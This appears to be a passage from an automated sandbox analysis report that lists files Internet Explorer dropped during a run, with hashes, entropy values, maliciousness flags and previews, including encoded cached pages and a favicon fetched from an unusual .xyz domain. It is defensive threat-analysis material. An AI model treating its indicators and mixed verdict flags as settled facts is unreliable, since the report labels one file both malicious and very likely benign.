                                              SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                              MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                              SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                              SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                              SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                              Malicious:true
                                              Reputation:high, very likely benign file
                                              Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                              C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{CFC842C0-9BDD-11EB-90E4-ECF4BB862DED}.dat
                                              Process:C:\Program Files\internet explorer\iexplore.exe
                                              File Type:Microsoft Word Document
                                              Category:dropped
                                              Size (bytes):29272
                                              Entropy (8bit):1.7791572136811602
                                              Encrypted:false
                                              SSDEEP:48:IweGcprnGwpLk9G/ap8kVGIpckF0GvnZpvkF4Gooqp9kFEWGo4xpmkFnGW2G9GWZ:rCZxZk52kXWkF9tkFUfkFsxMkFdkkumB
                                              MD5:3A52BE236B6B342ED6E51DCE945FA1CE
                                              SHA1:23CE836FCF6D8844E79564840B151E31C000D49D
                                              SHA-256:6158F823A7AA85AEFBAE170B888CDD4120B89589C3B04408E3BF17FC7C7E428D
                                              SHA-512:A0832870E572CB72E6E99E430640CD345AACF6545A5C8C8257AE2C182A059E269C0E8EC2A0AD4C33F777E747F794E9CFACF1574943C21B3380CACC2E4E0B5486
                                              Malicious:false
                                              Reputation:low
                                              Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{EB16AD64-9BDD-11EB-90E4-ECF4BB862DED}.dat
                                              Process:C:\Program Files\internet explorer\iexplore.exe
                                              File Type:Microsoft Word Document
                                              Category:dropped
                                              Size (bytes):71784
                                              Entropy (8bit):2.0462565138176716
                                              Encrypted:false
                                              SSDEEP:192:rSZpZw2nWut3fFxM1lHt/sMt1NsWQZbzRsEtDODrfp:rO/nWOPIfNk40BbWQGfp
                                              MD5:2260DAD92544072244868E489FB34DB9
                                              SHA1:3124D173E749643C1D5AA834DB7F8DDA541EBD8B
                                              SHA-256:CBB2EC98E72C52BF489ED5278322874F85334CF35FD4DFF111B9758BF6B62DB5
                                              SHA-512:137A4C6C297623B82CA6A9CF495F8835343FAE6E847D337159548CAE87453208BBEBF1567333442B6C3B663DA277771E0923AE6724E0C2AD799464C177FC4628
                                              Malicious:false
                                              Reputation:low
                                              Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{CFC842C2-9BDD-11EB-90E4-ECF4BB862DED}.dat
                                              Process:C:\Program Files\internet explorer\iexplore.exe
                                              File Type:Microsoft Word Document
                                              Category:dropped
                                              Size (bytes):27380
                                              Entropy (8bit):1.84595127048021
                                              Encrypted:false
                                              SSDEEP:96:rtZaQq68BShjN25WSM+WiydalIBhxiydalIBLA:rtZaQq68khjN25WSM+WiHchxiHcLA
                                              MD5:E9163B2AE7B15B237A167FC198DE5641
                                              SHA1:ACFDB46751B4CF1B75A3D6C084A779ADF7B0BE9B
                                              SHA-256:ADBB426A2EBE81808897B9DEAF2F52988CA933FFBA39831AFAFA98073EFEDB4C
                                              SHA-512:0EACE6B67C22CE43E05FBB5DABEBD304B90A77D56732476F93C02C24380AE63F5193687DD68FBB2D24DDC8354A407AAF66DC0AF685CF5B214D8D31D46F2B9BD4
                                              Malicious:false
                                              Reputation:low
                                              Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{EB16AD66-9BDD-11EB-90E4-ECF4BB862DED}.dat
                                              Process:C:\Program Files\internet explorer\iexplore.exe
                                              File Type:Microsoft Word Document
                                              Category:dropped
                                              Size (bytes):27372
                                              Entropy (8bit):1.8411793585877265
                                              Encrypted:false
                                              SSDEEP:48:IwNGcproGwpacG4pQMGrapbSfGQpByGHHpccTGUp8RGzYpmrxGopch/tiXubGw4q:rTZwQ86KBSJjJ2UWfMf+GXtxGX4zA
                                              MD5:5C933E422E4D05693D6F892E4D6B27EC
                                              SHA1:1EA59403C943FFB2C1576C1F5318AEF6A5A33E44
                                              SHA-256:705CD2D5F7AED685D8090014E2CA1BBF59B8E8427D501E4E4324206FCAA3764C
                                              SHA-512:7EE3C2DABF3D4A1077C58700BF62FCA4495CA5B5E3B7BDCDCD91B7D2D5B9EA094CD1D3AFA6A1FB15C10C8857C2741F53B4016B69F52BCA50225CDED275365AFC
                                              Malicious:false
                                              Reputation:low
                                              Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{EB16AD68-9BDD-11EB-90E4-ECF4BB862DED}.dat
                                              Process:C:\Program Files\internet explorer\iexplore.exe
                                              File Type:Microsoft Word Document
                                              Category:dropped
                                              Size (bytes):27380
                                              Entropy (8bit):1.8482883646521673
                                              Encrypted:false
                                              SSDEEP:96:rwZHQ76tBSbjB25WlM4Wz7PvUwoF08xz7PvUwoF0m7PvUdA:rwZHQ76tkbjB25WlM4WnkF08xnkF0UoA
                                              MD5:097FC8EEADA8DD01DAEC6C462A31DD35
                                              SHA1:46F1B7583CC86AAB9395B1FAEC946D1658BB848E
                                              SHA-256:25C296ADBF630517DDD009DE945AB0F22F1D618445E49B710579A2CF28CF300E
                                              SHA-512:9C50F30F128187F3D6BB9237AD905014FE4F5B507C4A99676E16B84416597D41C13BB11F3E8A7C7134D1559A21021629C3266F30F91D36DAD594393CCAE587B3
                                              Malicious:false
                                              Reputation:low
                                              Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{EB16AD6A-9BDD-11EB-90E4-ECF4BB862DED}.dat
                                              Process:C:\Program Files\internet explorer\iexplore.exe
                                              File Type:Microsoft Word Document
                                              Category:modified
                                              Size (bytes):27400
                                              Entropy (8bit):1.8512199349283107
                                              Encrypted:false
                                              SSDEEP:192:rtZS7Q66rkCjp2FWdMZCHjJUuxHjJUXjHA:rDSUlw84cuMtTtv
                                              MD5:A60BDB9CE0572FB572173F9286057CC6
                                              SHA1:646547C9026FADE61A6BFDF3AC88C95537EDFB3A
                                              SHA-256:5400AF4183D85C04D3C66185EC8E6D4EEC28824743C0EEDABD3B4488FC278A4E
                                              SHA-512:D14C2397EAA0DD1E31339BF24757491AE2F1E9CBD2F7ADCE8B67332E4F602AB2912702DE6480ABD978645F08F576109671B381F65841CE275B52F3D9A611F1B4
                                              Malicious:false
                                              Reputation:low
                                              Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-17529550060\msapplication.xml
                                              Process:C:\Program Files\internet explorer\iexplore.exe
                                              File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):656
                                              Entropy (8bit):5.072068705558107
                                              Encrypted:false
                                              SSDEEP:12:TMHdNMNxOEwn+NnWimI002EtM3MHdNMNxOEwn+NnWimI00ObVbkEtMb:2d6NxOQNSZHKd6NxOQNSZ76b
                                              MD5:104EA9756A37CE24C209ABE77B98F3A5
                                              SHA1:FCC6FFC3D5FBF4AA530D5AB41F1CD90DF88CD730
                                              SHA-256:F72E3179F8A5F64112306C8EBAA3DFA6E6FEAE8916CBC9AD56C69FD30616A7D5
                                              SHA-512:4BAB80F61EE5BA4932899F20326C4C9B02064578CBF5BB7140A601C6968E02B8C489B41A1779BE61C47A60E8EB4FBF8A78598E5A474D1BDB4109BE8994DAC224
                                              Malicious:false
                                              Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xa6cfbf55,0x01d72fea</date><accdate>0xa6cfbf55,0x01d72fea</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xa6cfbf55,0x01d72fea</date><accdate>0xa6cfbf55,0x01d72fea</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig>..
                                              C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-18270793970\msapplication.xml
                                              Process:C:\Program Files\internet explorer\iexplore.exe
                                              File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):653
                                              Entropy (8bit):5.1106973961329505
                                              Encrypted:false
                                              SSDEEP:12:TMHdNMNxe2kmN+NnWimI002EtM3MHdNMNxe2kmjVCNnWimI00Obkak6EtMb:2d6Nxr/N+NSZHKd6Nxr/jINSZ7Aa7b
                                              MD5:A3890CF386C48AFBFF0CCDDBCC18FC78
                                              SHA1:FE7D07A2C1859452C0A6F1BE56D9C3A9B4F0016C
                                              SHA-256:207BDEC62E8237E33327B55531D9B038CA4BFA8A64C7BE613F09E69EAD4F0284
                                              SHA-512:BF00621DFF303A2B3C196AD96A07E754F318CBF48447CCC6F292EE9B2A2C4C58DF0DCF2C489BBCE7A82FC758010A31B4674933432AE9994BEF35F9B66B04CEC8
                                              Malicious:false
                                              Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0xa6c6363b,0x01d72fea</date><accdate>0xa6c6363b,0x01d72fea</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0xa6c6363b,0x01d72fea</date><accdate>0xa6c898bc,0x01d72fea</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Amazon.url"/></tile></msapplication></browserconfig>..
                                              C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-21706820\msapplication.xml
                                              Process:C:\Program Files\internet explorer\iexplore.exe
                                              File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):662
                                              Entropy (8bit):5.09065647313195
                                              Encrypted:false
                                              SSDEEP:12:TMHdNMNxvLwn+NnWimI002EtM3MHdNMNxvLwn+NnWimI00ObmZEtMb:2d6Nxv5NSZHKd6Nxv5NSZ7mb
                                              MD5:C6783F79FC2C7C093739362FBC19AD58
                                              SHA1:95CF3A457071FD9500752349BBE23E5F79F86486
                                              SHA-256:19A3E1563758AEAFBE82DC46F4E8877F3948D0CE8E5BAFE9C1B70D27E92CA9BD
                                              SHA-512:95893B060D037DFDD18888BCCA8C63D5BFE466D78EC954E69910A508BFCB5FC02F92393FB06181C64F1DDE11BA329C79A23253AA6ABE98E13D784F98D94111ED
                                              Malicious:false
                                              Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0xa6cfbf55,0x01d72fea</date><accdate>0xa6cfbf55,0x01d72fea</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0xa6cfbf55,0x01d72fea</date><accdate>0xa6cfbf55,0x01d72fea</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Wikipedia.url"/></tile></msapplication></browserconfig>..
                                              C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-4759708130\msapplication.xml
                                              Process:C:\Program Files\internet explorer\iexplore.exe
                                              File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):647
                                              Entropy (8bit):5.0730429585372505
                                              Encrypted:false
                                              SSDEEP:12:TMHdNMNxiToCNnWimI002EtM3MHdNMNxiToCNnWimI00Obd5EtMb:2d6Nx8NSZHKd6Nx8NSZ7Jjb
                                              MD5:FD02998C22261C6B189F2CD8BB716682
                                              SHA1:C780C96F5FC30738892BA31E040A04E845C3883F
                                              SHA-256:DAFFD1D4A7296FADEE934437AF3C15FDB866BBB2F6C70799E07BC3A11EFF25E1
                                              SHA-512:FD33F6197FF1D685FC6232D054A188603DB2902A44EC224AA0FA19E28D70709CF27B79D6DB2EC0E2DB808E950AC980E3CBE920DE1D592A0BA097501F13ED1153
                                              Malicious:false
                                              Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0xa6cd5cf5,0x01d72fea</date><accdate>0xa6cd5cf5,0x01d72fea</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0xa6cd5cf5,0x01d72fea</date><accdate>0xa6cd5cf5,0x01d72fea</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Live.url"/></tile></msapplication></browserconfig>..
                                              C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-6757900\msapplication.xml
                                              Process:C:\Program Files\internet explorer\iexplore.exe
                                              File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):656
                                              Entropy (8bit):5.104107694083284
                                              Encrypted:false
                                              SSDEEP:12:TMHdNMNxhGwnx+xYNnWimI002EtM3MHdNMNxhGwnx+xYNnWimI00Ob8K075EtMb:2d6NxQGNSZHKd6NxQGNSZ7YKajb
                                              MD5:FEFACF8DC8E0F5BD4BD693A79A676BC9
                                              SHA1:004B7037005FED294B5B35F2F7F1C5AB310F5529
                                              SHA-256:994BD02B6D29BF113359853BC88C438BAECE65FD6BD584706339825857148621
                                              SHA-512:4FD75B2FECE4E5154829AEB5D6FF9D9E8ECC6E3F809B3410D1BB9478C3F89BB4A295F84A7B2D64DC9D33A239B5D6E9AF31974526AB678BF594A740DE1D11F580
                                              Malicious:false
                                              Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xa6d221a8,0x01d72fea</date><accdate>0xa6d221a8,0x01d72fea</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xa6d221a8,0x01d72fea</date><accdate>0xa6d221a8,0x01d72fea</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig>..
                                              C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-8760897390\msapplication.xml
                                              Process:C:\Program Files\internet explorer\iexplore.exe
                                              File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):653
                                              Entropy (8bit):5.075137191538691
                                              Encrypted:false
                                              SSDEEP:12:TMHdNMNx0nwn+NnWimI002EtM3MHdNMNx0nwn+NnWimI00ObxEtMb:2d6Nx0tNSZHKd6Nx0tNSZ7nb
                                              MD5:9182047FE1AD40E359EC65E81BEEB6DE
                                              SHA1:FA4F828D0C3F346E54665A7411ED5C7AEC11D9FC
                                              SHA-256:06452FCBE9F3F0949CDBCEA9D5A10D90BC27B39AC78458ABC2BE115A42F55381
                                              SHA-512:7A71E42780068083730709D6C347736EF722BEB44B7BF20BDC9B19AD4BF23BA4846D3BC72460B51910A5FD98E6AC1BB6A2F5803ADB6CD0FC4AC8C0F08D3647D5
                                              Malicious:false
                                              Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0xa6cfbf55,0x01d72fea</date><accdate>0xa6cfbf55,0x01d72fea</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0xa6cfbf55,0x01d72fea</date><accdate>0xa6cfbf55,0x01d72fea</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Reddit.url"/></tile></msapplication></browserconfig>..
                                              C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20259167780\msapplication.xml
                                              Process:C:\Program Files\internet explorer\iexplore.exe
                                              File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):656
                                              Entropy (8bit):5.09821601153262
                                              Encrypted:false
                                              SSDEEP:12:TMHdNMNxxToCNnWimI002EtM3MHdNMNxxToCNnWimI00Ob6Kq5EtMb:2d6Nx1NSZHKd6Nx1NSZ7ob
                                              MD5:B63D3515E361EC45FA7A2DC40E01A2E9
                                              SHA1:0D2DA8B3216B435FEA5BC0F77B1678213DDB45C4
                                              SHA-256:05B68CD384A5578FF167A7BD6EEB6DF99772D8E6D96126FC9AF070E2FC4C1A54
                                              SHA-512:34633B0D4065F910EE3BC407A2CDDE205E924F5025F5FD131913F9915AEDD4BA9C1C2E0CEA74FEA5F60104BDEF5F823604DAD6008489D30C89B3F9201DBF0261
                                              Malicious:false
                                              Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0xa6cd5cf5,0x01d72fea</date><accdate>0xa6cd5cf5,0x01d72fea</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0xa6cd5cf5,0x01d72fea</date><accdate>0xa6cd5cf5,0x01d72fea</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\NYTimes.url"/></tile></msapplication></browserconfig>..
                                              C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20332743330\msapplication.xml
                                              Process:C:\Program Files\internet explorer\iexplore.exe
                                              File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):659
                                              Entropy (8bit):5.064753423680847
                                              Encrypted:false
                                              SSDEEP:12:TMHdNMNxcxpBNnWimI002EtM3MHdNMNxcxpBNnWimI00ObVEtMb:2d6Nx4NSZHKd6Nx4NSZ7Db
                                              MD5:40A5818F11F5D8FFA5187812F7958082
                                              SHA1:34ED6B6CEA9E17223E294C1F4B3B1D24EB648845
                                              SHA-256:11343298EAB949A86764BE7AFCE8AA5A8E342641C9F7D3D5FD28D7B2737F2391
                                              SHA-512:65BD43CDF24FA7AB4E78DB4AD5BE9F48F54E14FC4B0BB90AEC95892A989667BE4F9D7533AB4C83A5D7F8D048B2A6AA87108DA587ECEDA0B67D2A3D1EEFF2C9F4
                                              Malicious:false
                                              Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xa6cafa8b,0x01d72fea</date><accdate>0xa6cafa8b,0x01d72fea</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xa6cafa8b,0x01d72fea</date><accdate>0xa6cafa8b,0x01d72fea</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig>..
                                              C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin8215062560\msapplication.xml
                                              Process:C:\Program Files\internet explorer\iexplore.exe
                                              File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):653
                                              Entropy (8bit):5.05905642409462
                                              Encrypted:false
                                              SSDEEP:12:TMHdNMNxfnToCNnWimI002EtM3MHdNMNxfnToCNnWimI00Obe5EtMb:2d6NxPNSZHKd6NxPNSZ7ijb
                                              MD5:EBB9B026838431F21584ECA99905F355
                                              SHA1:31D69AFA1E195294CD7E7DC2C5B955908A0AAB44
                                              SHA-256:D332E45F4AB77AB12E74BED8E225123A276693E5D92D2B3F7458A68EEFCCA373
                                              SHA-512:A18A1B6E333A055E756659A77DB0493B000BA4F5CC5F0E8AD6F2EE29FD125ECA0E1497829FDE7D3B39096A05BC50D9C72792349D070B0FC04CA4B7F06ECB6665
                                              Malicious:false
                                              Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0xa6cd5cf5,0x01d72fea</date><accdate>0xa6cd5cf5,0x01d72fea</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0xa6cd5cf5,0x01d72fea</date><accdate>0xa6cd5cf5,0x01d72fea</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Google.url"/></tile></msapplication></browserconfig>..
                                              C:\Users\user\AppData\Local\Microsoft\Internet Explorer\imagestore\ynfz0jx\imagestore.dat
                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):5640
                                              Entropy (8bit):4.1265870418243935
                                              Encrypted:false
                                              SSDEEP:96:c0aWBQm5zDlvV2rkG4zuAZMXJFG62q7mQT:cCBZ5zZ0IG46AaXJFG6v7mW
                                              MD5:F8299DB9AE12D225CE908F04E23EA5FD
                                              SHA1:2D42D9AB1C3A86D2B6791A08C4B405D2D44D88B0
                                              SHA-256:A22B096359F4B27E7F6D21AB950ACE3536B279F4DF78FD181172E4542F690C5E
                                              SHA-512:00634F0D8EDD9E93BCBBB0A6B22A6C3948CBA1E69600008DEDCD20266A3C6A5F2C001036651BB3081B0A7F331572046F13BE8F4C7507212F557AE8140A8F2C29
                                              Malicious:false
                                              Preview: ..........h.t.t.p.:././.2.q.7.m.f.x.2...x.y.z./.f.a.v.i.c.o.n...i.c.o.~............... .h.......(....... ..... .....@.....................s...s...s...sw..r.......s...s...s...s.......s...s..s...s...s...s...r...s{..s...s#..s...s..r..s..s...s[..s...s...s..s...s...s...s}..s...sW..r..s...sm..sK..sC..sw..s..s...s%..s!..s..s...s...s...sU..s.sY..s...s..s..r#......s...s...s..s...r%..s[..s...s...s..s]..s...r.sS..s...sq..........s...s...s...s...s.......su..s...s.......s...s..s.sA..............s%..s..s#......r...r...s]..........s...s..sk..s...s...........s...s...s]......s...r..s7..........s...s..r...r...s...r...........s...s.......s...s..s7..........s...s..si..s?..s7..s...........s...s.......s...s...rW..........s...s..s...s...s...s...........s...s[..........ss..s...s.......s...s..sm..sI..s;..s.......s!..s..s#......s...s...s..sQ......s...s..s...r...sm..s...r...s...r...s...s...r...s...sQ..s..rK..s...sg..s'..........s...s...s..s...s'..s_..s...s...s...rQ..s..s...sK..r/
                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\Yn73Zb3X[1].htm
                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                              File Type:ASCII text, with very long lines, with no line terminators
                                              Category:dropped
                                              Size (bytes):295680
                                              Entropy (8bit):5.999838219242012
                                              Encrypted:false
                                              SSDEEP:6144:ssOrYIRRX/tITapfIocFNVmmsiRWaqgb9SCEIYd:s1cILmTapZlmBvPICYd
                                              MD5:34949583D1A13C7274DB206072CB036B
                                              SHA1:B98EDF13C8BCB184B772B7273A3F4E39A8D2CBBE
                                              SHA-256:E062F92191A2EADD3DC9F4A9592820430830071E4E185210F314A0A41B6565D4
                                              SHA-512:EE1DCCBE7804407FCAE112F3D94DA64D1E39716D15537370F9A2A4E782109238F54F4468E0E40BE9EC5C564B49B107767CF099D746568756729881AA7447FE3A
                                              Malicious:false
                                              Preview: NgiZ+EuzvV8Dk6KgL8NL0AB1CLWto8eYc6Cc36MjMFSIDWVJSicUb6KZ/f91IJ/CVp/sW5JSdrnZRIyFj65I5t5k1QDnfevoySTSEMXy2vlf8OZ/+4E5WCy+FeWG0cIYIycAJeG/cRu1NtqlhY7/D/IsGF93OygChV5W0nPYm8IZgxagI7wiy1uDWzENlzzBTogRfEp2+y2P3MMsh61+TB5mlKjhlIteT2IU46uz1TRycWQ0AZ3ea0kWy6hEY+GIF/SVuoYBN0oIU396DgisVTXw2qqLuKzkJGY7/eFBHrS5s4Zg+XIN4tSf9M1q7JZSs0gmRS1B3z+ODEWIlhgbXJCm4v/p9/fT6DMFaKsFSW3VlMPWmOYU2OzA1neJnRlrmyDrYclJusC6GpVCoQR3VQRblqw6hS0XRJsbn1phqKQ8tNQLemPKM0RH+p6JLAPasIUdYrX9qtBGtKNQ0UUyps+yYkRgEE+JH3EQQlyAuXeR7Tbmj1DfzHiLxYRzL9p8npPW46lECsu7FmO+PWkVE8Ng3bWT9d3kYnn+PDn61Au2Ijoo1A/ze1JE/VA7K4xAWZQDDdl0ZI8FL+VEXF58PQv9U6Y8U1LDEuYT1npxCFXCLXUzf4P2hd1cjTIgn4G67mlocEzglh5akxVs6HZ8aOvQHN+DgXsPcBAe45nSpnjL7ly1ieui7kqHSCR74MwL9Mkmeh+zlGLf7/QL9Pi09dlseLH11B0Vo5aE3nDzfv29yuH2j4i7JuqTcq26HqE4/PURppYiynQqW9OYyg/urwxAR8qa27xUR8vN+QtGzHz6DAsc6tjiDdObh7N4GAL1bJQFK3uYT5fDsvvMbdYveyaeX5GtellKMYhrVo9LppGZ0W+h99/sfVZZ0SyaqLoFvBIqmvn16kectd188R5piI9bke/ULpMSN9gBtfpkwc4GlZvdoT9XNZKS6xDLWDbKXHa5/+1BSh67G7RSxOCLM/FHTB/u9FEh1f2CEPna
                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\_2F[1].htm
                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                              File Type:ASCII text, with very long lines, with no line terminators
                                              Category:dropped
                                              Size (bytes):2480
                                              Entropy (8bit):5.976543235649517
                                              Encrypted:false
                                              SSDEEP:48:BqdSyvgPpigpNpFoa5UKXDLYTPuBTkv6pb9xdjF0OaHs8CZD:0DwpNpFb5UKXDLYTakvKfdj+pED
                                              MD5:991597F4F6A721FEC09222FE9072765F
                                              SHA1:DAF979C636308196196CD15F700FCB6D33E9F5DB
                                              SHA-256:A1306CD411F6DDAD5523C1AEBA5049FF58196AC76557B1BFAFE8BE9DC2893D70
                                              SHA-512:E7DBBFB6D4962B12409D24A8E91DA9A4C94B2ECD35BFEDC893340589BA83840BCEBEA45E0B933AC38C99EDCFDF3596BF6944ED1F977B8D4321F3E60901A7B596
                                              Malicious:false
